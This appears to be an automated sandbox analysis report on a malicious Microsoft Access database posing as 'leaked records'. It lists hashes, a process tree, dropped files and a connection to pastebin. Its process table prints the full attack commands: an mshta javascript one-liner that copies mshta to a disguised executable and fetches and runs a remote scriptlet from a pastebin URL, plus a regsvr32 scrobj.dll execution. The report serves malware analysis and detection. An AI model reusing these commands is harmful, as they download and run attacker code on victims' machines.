File name: Leaked_Records_15072019_Col.malware
Full analysis: https://app.any.run/tasks/62b0a7f2-e9f6-4199-bb6d-3bf5470a7210
Verdict: Malicious activity
Analysis date: July 17, 2019, 14:52:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-msaccess
File info: Microsoft Access Database
MD5: BEFC603B7E59E0B739AE150FFC0CAD3A
SHA1: 4BF499C320E6806E877E68876A3BEB2ADA2A45AC
SHA256: 7C02D2F27147C49030C0619D1D313CFA24234F789E149B2E3D1478400496A32C
SSDEEP: 1536:DAQxNqc6lh3WHzVdGduAixBQdpdzdmdudJ:DAQxNqc6lsfkuAixAjJEcJ
| Extension | Identified type |
|---|---|
| .accdb | Microsoft Access 2007 Database (90.4) |
| .pi2 | DEGAS med-res bitmap (9.5) |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 3540 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Leaked_Records_15072019_Col.malware.accdb | C:\Windows\system32\rundll32.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3736 | "C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE" /NOSTARTUP "C:\Users\admin\AppData\Local\Temp\Leaked_Records_15072019_Col.malware.accdb" | C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE | — | rundll32.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Access; Version: 14.0.6024.1000 |
| 3408 | "C:\Windows\System32\mshta.exe" javascript:eval(new%20ActiveXObject("Scripting.FileSystemObject").CopyFile%20("c:\\windows\\system32\\mshta.exe",%20new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil.exe"));eval(new%20ActiveXObject("Wscript.Shell").Run(new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil%20javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close();"));close(); | C:\Windows\System32\mshta.exe | — | MSACCESS.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
| 2224 | "C:\Users\admin\AppData\Local\Microsoft\cutil.exe" javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close(); | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | — | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
| 3080 | "C:\Windows\System32\regsvr32.exe" /u /n /s /i:C:\Users\admin\AppData\Local\logs.tmp scrobj.dll | C:\Windows\System32\regsvr32.exe | — | cutil.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft(C) Register Server; Exit code: 5; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3736 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\CVRF7DD.tmp.cvr | — | — | — |
| 3736 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw | mdw | FD1944E71E7C179D8CE8A92E40E68796 | 960E3318E2CE56D9AA6A6A9AC41250A4B67A0A6DE361D7569FF2F2A00FC5CEFE |
| 3408 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | executable | E2FE656A79D8F4C4FD70201E7423BDA0 | DB40B518DEB81B146CC81B0C360AECC84204E3CDC108B1F5F158EE60C1792806 |
| 2224 | cutil.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\viwSRB6M[1].txt | xml | 3739532BDF9B523E245EEEDD062AB5FF | 544C113236191E588D7679CB9168C5D45A8D4736B5D08217BE1C66DED4F468F3 |
| 2224 | cutil.exe | C:\Users\admin\AppData\Local\temp.tmp | executable | 91456160503D1965136BBE939606878E | 350CDEC0802FB24B9AA93CF44C318DCC12BBAF2D85B0E43D0142C54690A18138 |
| 2224 | cutil.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | 936B62A5A161618FA0DE04F10E56E152 | F307C109EB0D41B2209C3C982B38279F2E772660D9F6F207D46C623CF0BA9693 |
| 2224 | cutil.exe | C:\Users\admin\AppData\Local\logs.tmp | text | 626C22DE97EEC542521DC24103DAA418 | 85287E7301D3983BBE6A95B4FA6F6451DB816E33F9366E27E561711B505F14C7 |
| 3736 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\Database.lnk | lnk | 31AEFA424BD036B40F8B9B64C1C9F78F | 67106A3278F63805F941D515BE4A40EA1DB3F0D926A4C9A8C71376F10E5EED26 |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2224 | cutil.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
| Domain | IP | Reputation |
|---|---|---|
| pastebin.com | | shared |
| Process | Message |
|---|---|
| MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw |